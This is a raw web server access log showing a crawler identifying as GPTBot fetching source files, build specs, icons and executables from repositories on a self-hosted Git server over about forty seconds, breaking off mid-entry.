"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20910] [Gzip 10.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9870] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12515] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 10836] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 11721] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 10835] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 11750] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 11749] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9463] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9461] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10901] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" -[17/Feb/2026:13:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" -[17/Feb/2026:13:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16594] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 10805] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 10808] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11892] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11923] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11923] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 10808] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10796] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29883] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10173] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9511] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9462] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" -[17/Feb/2026:13:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 973666] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 973665] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr 